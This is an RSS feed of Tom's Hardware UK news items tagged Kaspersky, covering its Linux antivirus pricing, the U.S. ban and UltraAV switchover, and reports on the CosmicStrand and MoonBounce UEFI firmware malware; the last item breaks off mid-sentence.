<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
     xmlns:content="http://purl.org/rss/1.0/modules/content/"
     xmlns:dc="https://purl.org/dc/elements/1.1/"
     xmlns:dcterms="http://purl.org/dc/terms/"
     xmlns:media="http://search.yahoo.com/mrss/"
     xmlns:atom="http://www.w3.org/2005/Atom"
>
    <channel>
        <atom:link rel="alternate" hreflang="en-GB"
                   href="https://www.tomshardware.com/uk/feeds/tag/kaspersky"
                   type="application/rss+xml"/>
        <title><![CDATA[ Latest from Tom's Hardware UK in Kaspersky ]]></title>
        <link>https://www.tomshardware.com/uk/tag/kaspersky</link>
        <description><![CDATA[ All the latest Kaspersky content from the Tom's Hardware UK team ]]></description>
        <lastBuildDate>Thu, 13 Nov 2025 12:05:29 +0000</lastBuildDate>
        <language>en</language>
        <item>
            <title><![CDATA[ Banned Russian antivirus maker Kaspersky rolls out new products — basic plan for Linux starts at $59.99 a year ]]></title>
            <link>https://www.tomshardware.com/software/antivirus/banned-russian-antivirus-maker-kaspersky-rolls-out-new-products-basic-plan-for-linux-starts-at-usd59-99-a-year</link>
            <description><![CDATA[ Kaspersky launches antivirus software for Linux, starting at $59.99 per year for one device, with a special first-year price of $38.99 for the basic plan. ]]></description>
            <guid isPermaLink="false">SnTYh7EtJLhCpbM4Y96rEX</guid>
            <enclosure url="https://cdn.mos.cms.futurecdn.net/ButQqa79Zsz7XQNR2Fq2D9-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
            <pubDate>Thu, 13 Nov 2025 12:05:29 +0000</pubDate>
            <updated>Thu, 13 Nov 2025 12:05:35 +0000</updated>
            <category><![CDATA[Antivirus]]></category>
            <category><![CDATA[Software]]></category>
            <category><![CDATA[Security Software]]></category>
            <dc:creator><![CDATA[ Zhiye Liu ]]></dc:creator>
            <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/HhmwL5w9ggUtLCPfqGjTi4.jpg ]]></dc:description>
            <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/ButQqa79Zsz7XQNR2Fq2D9-1280-80.jpg">
                <media:credit><![CDATA[Kaspersky]]></media:credit>
                <media:description><![CDATA[Kaspersky for Linux]]></media:description>
                <media:text><![CDATA[Kaspersky for Linux]]></media:text>
                <media:title type="plain"><![CDATA[Kaspersky for Linux]]></media:title>
            </media:content>
            <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/ButQqa79Zsz7XQNR2Fq2D9-1280-80.jpg" />
            <content:encoded>
                            <![CDATA[
                            <article>
                                <p>Kaspersky, which is <a href="https://www.tomshardware.com/software/antivirus/russia-based-kaspersky-antivirus-shuts-down-its-us-business-due-to-sanctions">prohibited from selling</a> its products in the United States due to national security concerns, has expanded into the Linux market. The Russian cybersecurity firm has ported its flagship antivirus software to Linux at an initial price of $53.99 for the first year, rising to $89.99 thereafter. With this new offering, Kaspersky is targeting Linux home users outside the United States.</p><p>Windows is widely recognized as the operating system most often targeted by attackers. Linux and macOS are targeted less often, but they are not invulnerable; Linux in particular has been a frequent target for malicious actors because most servers and cloud providers worldwide run it. That trend gives cybersecurity firms an opportunity to offer antivirus protection to consumers, and Kaspersky is leveraging its reputation to bring its antivirus software to the Linux market.</p><p>Kaspersky, like many other providers, offers tiered plans. Kaspersky Standard is the regular antivirus software; Kaspersky Plus and Kaspersky Premium are comprehensive internet security and total security solutions, respectively, with additional features such as a VPN, password manager, wallet protection, and more.</p><p>Regarding pricing for a single device, Kaspersky Standard starts at $59.99, while Kaspersky Plus and Kaspersky Premium cost $79.99 and $89.99, respectively. First-time Linux users are eligible for a discount of up to 40% for the first year.</p>
                                <h2 id="kaspersky-antivirus-for-linux-pricing">Kaspersky Antivirus For Linux Pricing</h2>
                                <div><table><thead><tr><th class="firstcol"><p>Plans</p></th><th><p>Price Per Year</p></th><th><p>First-Year Price</p></th></tr></thead><tbody><tr><td class="firstcol"><p>Kaspersky Premium</p></td><td><p>$89.99</p></td><td><p>$53.99</p></td></tr><tr><td class="firstcol"><p>Kaspersky Plus</p></td><td><p>$79.99</p></td><td><p>$51.99</p></td></tr><tr><td class="firstcol"><p>Kaspersky Standard</p></td><td><p>$59.99</p></td><td><p>$38.99</p></td></tr></tbody></table></div>
                                <p>Kaspersky for Linux supports 64-bit Linux distributions, including Ubuntu 24.04, ALT Linux 10, Uncom 2.3.5, and RED OS 7. The company provides its installer in DEB and RPM package formats. The minimum system requirements will strike some as a joke: a Core 2 Duo 1.86 GHz processor, 2GB of memory, 1GB of swap space, and 4GB of available disk space.</p><p>Kaspersky emphasizes that the Linux version does not meet GDPR compliance standards. Like its competitors, the company offers a 30-day free trial of Kaspersky for Linux, allowing you to evaluate the software before committing. At an annual cost of $59.99, Kaspersky for Linux presents a challenging proposition, particularly within a community where antivirus software is not a priority and political opinions are divided. Additionally, ClamAV, a widely used, free and open-source antivirus solution, remains prevalent within the Linux community.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
        <item>
            <title><![CDATA[ U.S. customers wake up to find Kaspersky antivirus sneakily replaced with UltraAV — switchover caught many users by surprise ]]></title>
            <link>https://www.tomshardware.com/software/antivirus/us-customers-wake-up-to-find-kaspersky-antivirus-replaced-with-ultraav-switchover-caught-many-users-by-surprise</link>
            <description><![CDATA[ Kaspersky antivirus abruptly uninstalls itself and installs UltraAV without asking customers. ]]></description>
            <guid isPermaLink="false">3sac7DUqP9JXXsAU8m7Fmk</guid>
            <enclosure url="https://cdn.mos.cms.futurecdn.net/wQXvDBA3DPRUD86u5abBrR-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
            <pubDate>Tue, 24 Sep 2024 11:13:03 +0000</pubDate>
            <updated>Tue, 24 Sep 2024 11:14:29 +0000</updated>
            <category><![CDATA[Antivirus]]></category>
            <category><![CDATA[Software]]></category>
            <category><![CDATA[Security Software]]></category>
            <author><![CDATA[ ashilov@gmail.com (Anton Shilov) ]]></author>
            <dc:creator><![CDATA[ Anton Shilov ]]></dc:creator>
            <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/uMZ5kNphxA2Ut6whdLaSQV.png ]]></dc:description>
            <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/wQXvDBA3DPRUD86u5abBrR-1280-80.jpg">
                <media:credit><![CDATA[Kaspersky]]></media:credit>
                <media:description><![CDATA[Kaspersky HQ]]></media:description>
                <media:text><![CDATA[Kaspersky HQ]]></media:text>
                <media:title type="plain"><![CDATA[Kaspersky HQ]]></media:title>
            </media:content>
            <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/wQXvDBA3DPRUD86u5abBrR-1280-80.jpg" />
            <content:encoded>
                            <![CDATA[
                            <article>
                                <p>Kaspersky, a Russian cybersecurity firm, <a href="https://www.tomshardware.com/software/antivirus/russia-based-kaspersky-antivirus-shuts-down-its-us-business-due-to-sanctions">ceased its U.S. operations</a> but has automatically replaced its antivirus software on American computers with UltraAV. No warning was given that the switch would occur on that day, reports <a href="https://www.bleepingcomputer.com/news/security/kaspersky-deletes-itself-installs-ultraav-antivirus-without-warning/">Bleeping Computer</a>. The move follows the U.S. government&apos;s ban on Kaspersky software updates and sales, which takes effect on September 29, 2024, over national security concerns.</p><p>Earlier this year <a href="https://www.tomshardware.com/tech-industry/cyber-security/us-bans-kaspersky-and-hands-out-sanctions-to-execs">Kaspersky was added to the U.S. Entity List</a> due to national security concerns and had to halt business in the U.S. In July, Kaspersky began laying off U.S. employees and preparing to close operations. In September the company notified its customers that they would be transitioned to UltraAV, an antivirus from Pango Group. However, the transition itself happened abruptly and without warning, via an automatic update a few days ago.</p><p>"Following the recent decision by the U.S. Department of Commerce that prohibits Kaspersky from selling or updating certain antivirus products in the United States, Kaspersky partnered with antivirus provider UltraAV to ensure continued protection for US-based customers that will no longer have access to Kaspersky’s protections," a statement by Kaspersky reads. "Kaspersky and UltraAV worked closely to ensure customers would maintain the standards of security and privacy users have come to expect from their service."</p><p>Many users were surprised to find that Kaspersky software had been abruptly removed from their devices and UltraAV installed instead. This occurred through an automatic update on September 19, 2024, and was intended to avoid any gap in protection. Customers reported confusion and concern; some even feared that malware had infiltrated their systems because of the unannounced switch. Those previously subscribed to Kaspersky&apos;s VPN services also found UltraVPN installed unexpectedly.</p><p>Additionally, some users had difficulty uninstalling UltraAV, which reappeared after they rebooted their devices.</p><p>Kaspersky defended its decision, explaining that the transition was made to ensure continued protection for U.S. customers after the company&apos;s departure from the market. The company assured users that UltraAV offers a similar set of features to Kaspersky&apos;s previous software. Meanwhile, UltraAV claims its service is even better than Kaspersky&apos;s because it offers $1 million in identity theft compensation.</p><p>"If you are a paying Kaspersky customer, when the transition is complete UltraAV protection will be active on your device and you will be able to leverage all of the additional premium features," a <a href="https://ultrasecureav.com/kl-transition">statement</a> by UltraAV reads. "Your billing schedule with UltraAV will be the same as your Kaspersky account. Annual and monthly billing will remain the same."</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
        <item>
            <title><![CDATA[ Russia-based Kaspersky antivirus shuts down its US business due to sanctions — offices to close by July 20 ]]></title>
            <link>https://www.tomshardware.com/software/antivirus/russia-based-kaspersky-antivirus-shuts-down-its-us-business-due-to-sanctions</link>
            <description><![CDATA[ Following its ban from selling products in the U.S., cybersecurity and antivirus solution provider Kaspersky Lab announced it will soon begin closing its operations there. ]]></description>
            <guid isPermaLink="false">mZdt2w9rosDPKcaV5VcoiR</guid>
            <enclosure url="https://cdn.mos.cms.futurecdn.net/wQXvDBA3DPRUD86u5abBrR-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
            <pubDate>Tue, 16 Jul 2024 14:25:06 +0000</pubDate>
            <updated>Wed, 09 Apr 2025 13:01:43 +0000</updated>
            <category><![CDATA[Antivirus]]></category>
            <category><![CDATA[Software]]></category>
            <category><![CDATA[Security Software]]></category>
            <dc:creator><![CDATA[ Jeff Butts ]]></dc:creator>
            <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/mu8yfvXw9Ut4an84MVDhs9.jpg ]]></dc:description>
            <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/wQXvDBA3DPRUD86u5abBrR-1280-80.jpg">
                <media:credit><![CDATA[Kaspersky]]></media:credit>
                <media:description><![CDATA[Kaspersky HQ]]></media:description>
                <media:text><![CDATA[Kaspersky HQ]]></media:text>
                <media:title type="plain"><![CDATA[Kaspersky HQ]]></media:title>
            </media:content>
            <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/wQXvDBA3DPRUD86u5abBrR-1280-80.jpg" />
            <content:encoded>
                            <![CDATA[
                            <article>
                                <p>Kaspersky Lab, a Russian cybersecurity and antivirus software company, <a href="https://www.bleepingcomputer.com/news/security/kaspersky-is-shutting-down-its-business-in-the-united-states/" target="_blank">announced</a> it will start shutting down all of its operations in the U.S. on July 20. The departure was inevitable after 12 of the company’s executives were hit with sanctions and the company’s <a href="https://www.tomshardware.com/tech-industry/cyber-security/us-bans-kaspersky-and-hands-out-sanctions-to-execs">products were banned</a> from sale in the U.S.</p><p>Kaspersky Lab told BleepingComputer of the pending closure and confirmed it would lay off all of its U.S.-based employees. Reportedly, the shutdown affects fewer than 50 employees in the U.S. The impact on cybersecurity could be much greater, since the company’s researchers have been responsible for stopping or slowing countless major security exploits.</p><p>The United States government has claimed that Kaspersky’s continued operations in the U.S. posed a significant privacy risk. Since Kaspersky is based in Russia, officials worry the Russian government could exploit the cybersecurity firm to collect and weaponize sensitive U.S. information.</p><p>In June, the Department of Commerce’s Bureau of Industry &amp; Security (BIS) issued sanctions on Kaspersky. A Final Determination hearing resulted in Kaspersky being banned from providing any antivirus or cybersecurity solutions to anyone in the United States. Kaspersky’s customers in the U.S. have until September 29, 2024, to find alternative security and antivirus software.</p><p>Kaspersky told BleepingComputer that it had “carefully examined and evaluated the impact of the U.S. legal requirements and made this sad and difficult decision as business opportunities in the country are no longer viable.” After all, it’s hard to run a business that provides cybersecurity and antivirus solutions when you’re banned from doing so.</p><p>The BIS placed Kaspersky Lab and its U.K. holding company on the U.S. government’s Entity List because of their ties to Russia. This prevented Kaspersky from conducting business in the U.S. At the same time, a dozen members of Kaspersky’s board of executives and leadership were individually sanctioned.</p><p>These sanctions froze the executives’ U.S. assets and prevented access to them until the sanctions were lifted. While Kaspersky insisted the ban was based on theoretical concerns rather than evidence of wrongdoing, sources close to the matter have said otherwise. Russian backdoors into Kaspersky’s software are an “open secret,” they said, and a Commerce Department official stated that the department believes it is more than just a theoretical threat.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
        <item>
            <title><![CDATA[ U.S. bans Kaspersky and hands out sanctions to execs — 100 days until class-leading antivirus ban takes effect ]]></title>
            <link>https://www.tomshardware.com/tech-industry/cyber-security/us-bans-kaspersky-and-hands-out-sanctions-to-execs</link>
            <description><![CDATA[ Antivirus company Kaspersky Labs and several subsidiaries were banned from U.S. operations on Thursday, and customers had 100 days to find an alternative. The U.S. also sanctioned 12 executives. ]]></description>
            <guid isPermaLink="false">65BQqtn5RwA6Uk6WeMAZGR</guid>
            <enclosure url="https://cdn.mos.cms.futurecdn.net/zQnMNmw4Uc5CgES3VL42a5-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
            <pubDate>Sat, 22 Jun 2024 15:37:32 +0000</pubDate>
            <updated>Wed, 09 Apr 2025 13:01:43 +0000</updated>
            <category><![CDATA[Cybersecurity]]></category>
            <category><![CDATA[Tech Industry]]></category>
            <dc:creator><![CDATA[ Sunny Grimm ]]></dc:creator>
            <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/TMvJDaYy3nyZ8kYLJ2rggY.png ]]></dc:description>
            <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/zQnMNmw4Uc5CgES3VL42a5-1280-80.jpg">
                <media:credit><![CDATA[Kaspersky]]></media:credit>
                <media:description><![CDATA[Kaspersky HQ]]></media:description>
                <media:text><![CDATA[Kaspersky HQ]]></media:text>
                <media:title type="plain"><![CDATA[Kaspersky HQ]]></media:title>
            </media:content>
            <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/zQnMNmw4Uc5CgES3VL42a5-1280-80.jpg" />
            <content:encoded>
                            <![CDATA[
                            <article>
                                <p>Kaspersky Lab, a Russia-based antivirus and cybersecurity company, has received two rounds of sanctions from the U.S. government. Kaspersky Antivirus products have been banned from sale in the U.S., and users have 100 days to find a functioning replacement before all functionality ends.</p><p>Fearing connections with the Russian government, the United States Department of Commerce’s Bureau of Industry and Security (BIS) <a href="https://www.bis.gov/press-release/commerce-department-prohibits-russian-kaspersky-software-us-customers" target="_blank">issued the first sanctions</a> on Kaspersky on Thursday, issuing a Final Determination banning Kaspersky from providing antivirus or cybersecurity solutions to anyone in the United States. The sweeping ban was the first of its kind issued by the BIS after expanded powers were granted by the last two presidents of the United States.</p><p>The U.S. also placed Kaspersky Lab and its U.K. holding company on the Entity List, cutting them off from any U.S. trade entirely. The next day, twelve members of Kaspersky Lab’s board of executives and leadership <a href="https://home.treasury.gov/news/press-releases/jy2420" target="_blank">were individually sanctioned</a>, with most of Kaspersky Lab’s C-suite receiving individual punishment for their association with Kaspersky and suspected association with the Russian government. CEO and founder Eugene Kaspersky was excluded from this round of sanctions.</p><p>The United States government claims Kaspersky’s operation in the U.S. is a significant privacy risk due to Kaspersky’s operations in Russia, the site of its world headquarters. “Russia has shown time and again they have the capability and intent to exploit Russian companies, like Kaspersky Lab, to collect and weaponize sensitive U.S. information,” said Commerce Secretary Gina Raimondo. “We will continue to use every tool at our disposal to safeguard U.S. national security and the American people.” Under Secretary for Industry and Security Alan Estevez added, “With today’s action, the American cyber ecosystem is safer and more secure than it was yesterday.”</p><p>Kaspersky’s comments on the sanctions read as disappointed. “Kaspersky believes that the Department of Commerce made its decision based on the present geopolitical climate and theoretical concerns rather than on a comprehensive evaluation of the integrity of Kaspersky’s products and services.” Kaspersky claims it offered several alternative solutions, including having a verified third party independently verify the safety of Kaspersky programs, but these solutions were denied.</p><p>Kaspersky is also well-known for its industry-leading malware research, which has stopped or slowed countless major security exploits, including the <a href="https://www.tomshardware.com/tech-industry/cyber-security/shrinklocker-ransomware-uses-bitlocker-against-you-encryption-craving-malware-has-already-been-used-against-governments">ShrinkLocker exploit</a> Kaspersky found in May. The sanctions will impact its ability to provide those security solutions to U.S. citizens. “Kaspersky has implemented significant transparency measures unmatched by any of its cybersecurity industry peers to demonstrate its enduring commitment to integrity and trustworthiness. The Department of Commerce’s decision unfairly ignores the evidence. The primary impact of these measures will be the benefit they provide to cybercrime.”</p><p>Kaspersky’s total U.S. ban was not surprising. Kaspersky software has not been allowed on government computers since 2017, and the full-scale ban follows the Department of Commerce’s aggressive stance against potential threat vectors. It is important to note that the Commerce Department’s final determination, sanction listing, and other communications do not list any evidence of any malicious action ever taken by Kaspersky. However, sources close to the matter claim Kaspersky Lab’s Russian backdoors are an “open secret,” with a Commerce Department official speaking <a href="https://www.nextgov.com/cybersecurity/2024/06/us-blacklists-sale-russia-based-kaspersky-products-over-ties-kremlin/397503/#:~:text=%E2%80%9CWe%20generally%20know,that%20we%20described.%E2%80%9D">anonymously, saying</a>, “We certainly believe that it’s more than just a theoretical threat that we described.”</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
        <item>
            <title><![CDATA[ CosmicStrand Malware Infects ASUS, Gigabyte Motherboards ]]></title>
            <link>https://www.tomshardware.com/news/cosmicstrand-malware-asus-gigabyte</link>
            <description><![CDATA[ Security software provider Kaspersky has dug into a newly identified malware that resides at the heart of your PC: the BIOS. CosmicStrand, as it has become known, mainly seems to infect Intel H81-based motherboards. But since it has only just been discovered, more infections may be lurking in disguise. ]]></description>
            <guid isPermaLink="false">hKyHdDqoMgk5Xfj7Ag9s54</guid>
            <enclosure url="https://cdn.mos.cms.futurecdn.net/LZ4d8aWcKPUzrH6jvf5AjY-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
            <pubDate>Tue, 26 Jul 2022 20:02:22 +0000</pubDate>
            <updated>Thu, 21 Aug 2025 09:50:28 +0000</updated>
            <category><![CDATA[Cybersecurity]]></category>
            <category><![CDATA[Tech Industry]]></category>
            <author><![CDATA[ francisco.alexandre.pires@proton.me (Francisco Pires) ]]></author>
            <dc:creator><![CDATA[ Francisco Pires ]]></dc:creator>
            <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/vVpPSVV4UyiTaveBZujqif.png ]]></dc:description>
            <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/LZ4d8aWcKPUzrH6jvf5AjY-1280-80.jpg">
                <media:credit><![CDATA[Kaspersky]]></media:credit>
                <media:description><![CDATA[Kaspersky-provided images on CosmicStrand]]></media:description>
                <media:text><![CDATA[Kaspersky-provided images on CosmicStrand]]></media:text>
                <media:title type="plain"><![CDATA[Kaspersky-provided images on CosmicStrand]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/LZ4d8aWcKPUzrH6jvf5AjY-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p><a href="https://securelist.com/cosmicstrand-uefi-firmware-rootkit/106973/">CosmicStrand is the latest</a> in a string of sophisticated malware that reaches hardware bits you&apos;d think were much harder to breach than your typical OS installation. But harder to breach doesn&apos;t mean unreachable, as any cybersecurity researcher will tell you. Researchers have recently found strands of a particularly nifty piece of malware lurking in both ASUS and Gigabyte motherboards <a href="https://www.tomshardware.com/news/gigabyte-h81-intel-motherboard,24004.html">based on Intel&apos;s H81 chipset</a>. CosmicStrand has evolved since its first appearance back in 2016, and it&apos;s currently unclear whether the outbreak is confined to those two companies&apos; boards or whether the larger motherboard market holds a darker revelation.</p><p>Researchers from Kaspersky Lab found the malware stranded in the motherboards&apos; Unified Extensible Firmware Interface (UEFI) - <a href="https://www.tomshardware.com/news/bios-firmware-definition,37646.html">their boot sector, so to speak</a>, which is tasked with identifying, verifying and booting up all the connected hardware bits. From simple fans spinning up all the way to your PC&apos;s overclocking capabilities <a href="https://www.tomshardware.com/reviews/best-cpus,3986.html">on the latest and greatest gaming CPUs</a> - it all leads to your PC&apos;s BIOS. For the sake of clarity, <a href="https://www.tomshardware.com/news/moonbounce-malware-hides-in-your-bios-chip-persists-after-drive-formats">this isn&apos;t the first such threat discovered</a> - but one is already too many, and it does add to the possible infection vectors.</p><p>Being the first thing to run within your system - long before any antivirus solution you might have can even be loaded into memory - BIOS-borne malware can be exceedingly difficult to remove. 
It can evade most antivirus applications, can&apos;t be deleted by a fresh OS install, and naturally survives storage wipes - three of the most common ways of getting rid of security threats such as these.</p><p>Things get especially tricky when the malware can deploy itself into your OS at the kernel level, at every boot. As a reminder, the kernel is the heart of your OS and is responsible for interfacing your hardware with the operating system&apos;s high-level functions. Of course, all OSes possess safeguards against kernel tampering, but in this case, Microsoft&apos;s solution, ThreatGuard, is neutered by the malware before its execution.</p><figure class="van-image-figure  inline-layout" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:493px;"><p class="vanilla-image-block" style="padding-top:129.21%;"><img id="" name="CosmicStrand_UEFI_malware_01.png" alt="Kaspersky-provided images on CosmicStrand" src="https://cdn.mos.cms.futurecdn.net/AESeeaNSmuSakJ5LdaxynY.png" mos="" align="middle" fullscreen="" width="493" height="637" attribution="" endorsement="" class=""></p></div></div><figcaption itemprop="caption description" class=" inline-layout"><span class="caption-text">CosmicStrand's infection flowchart. </span><span class="credit" itemprop="copyrightHolder">(Image credit: Kaspersky)</span></figcaption></figure><p>As Kaspersky&apos;s analysis of the malware shows, hijacking the kernel allows the malware to control the startup flow of the entire OS, letting it prioritize processes that enable it to reach a command and control server from which it can download the rest of its payload. Kaspersky estimates that this particular malware strand had to be written directly for the motherboards&apos; BIOS - it doesn&apos;t seem to have been an internet-borne piece of kit.</p><p>For now, the infections seem confined to China, Vietnam, Iran, and Russia. 
Kaspersky notes that it detected the malware on three of its customers&apos; computers. All of the customers were running different versions of Kaspersky&apos;s security software, and none shared any connection via a corporation, employer, or otherwise, adding an air of mystery as to the purpose of the infections in the first place.</p><figure class="van-image-figure  inline-layout" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:646px;"><p class="vanilla-image-block" style="padding-top:134.98%;"><img id="" name="CosmicStrand_UEFI_malware_09.png" alt="Kaspersky-provided images on CosmicStrand" src="https://cdn.mos.cms.futurecdn.net/Lhz6d2uX8TLPnAM7VJLtrY.png" mos="" align="middle" fullscreen="" width="646" height="872" attribution="" endorsement="" class=""></p></div></div><figcaption itemprop="caption description" class=" inline-layout"><span class="caption-text">Code similarities between CosmicStrand and MyKings malware, as detailed by Kaspersky. </span><span class="credit" itemprop="copyrightHolder">(Image credit: Kaspersky)</span></figcaption></figure><p>Kaspersky&apos;s analysis indicates that the adapted CosmicStrand malware was created by Chinese-speaking threat actors, based on code similarities with the payload responsible for the MyKings botnet - which itself included leftover Chinese characters throughout. Of course, this isn&apos;t a black and white world: the Chinese snippets could have been placed there to derail investigators. More time - and perhaps more cases - are needed before reaching any definitive answer.</p><p>Kaspersky does note that CosmicStrand&apos;s characteristics place its creation back in 2016 - that&apos;s how long this infection vector managed to slip by unnoticed. It&apos;s currently unclear how many other computers could be infected. 
We&apos;re likely to see infection numbers increase as Kaspersky and other security providers home in on this threat.</p><p>This also raises the question of what other BIOS malware might be lurking about today, with years of time to further develop and refine a threat that was unknown until now.</p><p>Cybersecurity is - and will never cease to be - a game of cat and mouse between security researchers and threat actors. But considering what we know today about this particular malware infection and how it&apos;s achieved, we can only suggest that users be wary of purchasing H81-based motherboards on the second-hand market. If they do, always remember to run an antivirus check, which is good practice for any PC built around hardware whose parts were in someone else&apos;s control.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ MoonBounce Malware Hides In Your BIOS Chip, Persists After Drive Formats ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/news/moonbounce-malware-hides-in-your-bios-chip-persists-after-drive-formats</link>
                                                                            <description>
                            <![CDATA[ It is very worrying that a trend among malware writers is to attempt to infect your PC motherboard's flash memory, so it can persist through an SSD/HDD wipe or replacement. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">gghnBWSUVDvvvDYQotkPyK</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/5EmSydkMb9yFPukGCXtjHh-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Sat, 22 Jan 2022 14:33:14 +0000</pubDate>                                                                                                                                <updated>Thu, 30 Jan 2025 16:32:04 +0000</updated>
                                                                                                                                            <category><![CDATA[Software]]></category>
                                                                                                                    <dc:creator><![CDATA[ Mark Tyson ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/56vqMYLDaKRHPhHZgbADFR.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/5EmSydkMb9yFPukGCXtjHh-1280-80.jpg">
                                                            <media:credit><![CDATA[Kaspersky Labs]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Kaspersky Labs discovers MoonBounce]]></media:description>                                                            <media:text><![CDATA[Kaspersky Labs discovers MoonBounce]]></media:text>
                                <media:title type="plain"><![CDATA[Kaspersky Labs discovers MoonBounce]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/5EmSydkMb9yFPukGCXtjHh-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>A new type of malware takes a decidedly more stealthy and hard-to-remove path into your OS — it hides in your BIOS chip and thus remains even after you reinstall your OS or format your hard drive. <br><br>Kaspersky has observed the growth of Unified Extensible Firmware Interface (UEFI) firmware malware threats since 2019, with most storing malware on the EFI System Partition of the PC&apos;s storage device. However, a <a href="https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/">sinister development</a> has been spotted over the New Year with a new UEFI malware, detected by Kaspersky&apos;s firmware scanner logs, that implants malicious code into the motherboard&apos;s Serial Peripheral Interface (SPI) Flash. The security researchers have dubbed this flash-resident UEFI malware &apos;MoonBounce&apos;.</p><p>MoonBounce isn&apos;t the first UEFI malware discovered in the wild that targets SPI flash. Kaspersky says that the likes of LoJax and MosaicRegressor came before it. However, MoonBounce shows "significant advancement, with a more complicated attack flow and greater technical sophistication." It also seems to have infected a machine remotely.</p><p>MoonBounce is undeniably clever in the way it gets into a system and makes itself hard to detect and dispose of. "The source of the infection starts with a set of hooks that intercept the execution of several functions in the EFI Boot Services Table," explains Kaspersky on its SecureList blog. The hooks are then used to divert function calls to the malicious shellcode that the attackers have appended to the CORE_DXE image. This, in turn, "sets up additional hooks in subsequent components of the boot chain, namely the Windows loader," said the security researchers. 
This allows the malware to be injected into an svchost.exe process when the computer boots into Windows.</p><figure class="van-image-figure  inline-layout" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:638px;"><p class="vanilla-image-block" style="padding-top:33.39%;"><img id="" name="MoonBounce-code1.jpg" alt="Kaspersky Labs MoonBounce" src="https://cdn.mos.cms.futurecdn.net/UCysVATKezjixsnRnroD2i.jpg" mos="" align="middle" fullscreen="1" width="638" height="213" attribution="" endorsement="" class="expandable"></p></div></div><figcaption itemprop="caption description" class=" inline-layout"><span class="caption-text">Magic marker values replaced during execution within shellcodes in MoonBounce. </span><span class="credit" itemprop="copyrightHolder">(Image credit: Kaspersky Labs)</span></figcaption></figure><h2 id="transport-technology-company-the-only-logged-attack-so-far">Transport Technology Company the Only Logged Attack so Far</h2><p>Of course, Kaspersky was interested to see what the malware would do next. So, on an infected machine, the researchers observed the malware process try to access a URL to fetch the next-stage payload and run it in memory. Interestingly, this part of the sophisticated attack didn&apos;t seem to go anywhere, so it wasn&apos;t possible to analyze any further steps in MoonBounce. Perhaps this malware was still in testing when it was spotted, and/or it is being held back for special purposes. 
In addition, the malware isn&apos;t file-based and does at least some of its operations only in memory, making it hard to see exactly what MoonBounce did on the single host PC on a company&apos;s network.</p><p>A single machine, owned by a transportation company, seems to be the only machine in Kaspersky&apos;s logs that has a MoonBounce infection in its SPI Flash. It isn&apos;t certain how the infection took place, but it is thought to have been instigated remotely. That sole machine at a transport technology company seems to have spread non-UEFI malware implants to other machines on the network. With much of its work being file-less and memory-resident only, it isn&apos;t easy to observe from this single sample.</p><p>Below, a flow chart breaks down how MoonBounce boots and deploys from the moment your UEFI PC is switched on, through Windows loading, and into being a usable but infected PC.</p><figure class="van-image-figure  inline-layout" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:916px;"><p class="vanilla-image-block" style="padding-top:77.95%;"><img id="" name="flow-chart.jpg" alt="Kaspersky Labs flow chart" src="https://cdn.mos.cms.futurecdn.net/eDUNgWmtecFUMSb2TxQrnh.jpg" mos="" align="middle" fullscreen="1" width="916" height="714" attribution="" endorsement="" class="expandable"></p></div></div><figcaption itemprop="caption description" class=" inline-layout"><span class="credit" itemprop="copyrightHolder">(Image credit: Kaspersky Labs)</span></figcaption></figure><h2 id="apt41-fingerprints-detected">APT41 Fingerprints Detected</h2><p>Another important branch of the work done by security researchers like Kaspersky is looking into who is behind the malware they discover, what the purposes of the malware are, and what specific targets the malware is primed 
